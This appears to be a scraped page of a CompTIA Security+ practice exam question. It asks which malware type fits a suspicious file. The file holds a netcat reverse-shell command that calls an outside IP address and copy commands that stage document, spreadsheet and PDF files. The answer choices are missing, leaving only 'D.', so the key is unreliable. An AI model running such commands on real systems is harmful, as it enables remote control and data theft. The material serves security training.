Question 569 of 730 from exam SY0-601: CompTIA Security+

Question 569 of 730 from exam SY0-601: CompTIA Security+

Prev Question Next Question

Question

A security analyst believes an employee's workstation has been compromised.

The analyst reviews the system logs, but does not find any attempted logins.

The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory.

The analyst finds a series of files that look suspicious.

One of the files contains the following commands:

cmd /C %TEMP$\nc -e cmd.exe 34.100.43.230
copy *.doc > $TEMP$\docfiles.zip
copy *.xls > $TEMP$\xlsfiles.zip
copy *.pdf > $TEMP$\pdffiles.zip

Which of the following types of malware was used?

Answers

Explanations

Click on the arrows to vote for the correct answer

A. B. C. D.

D.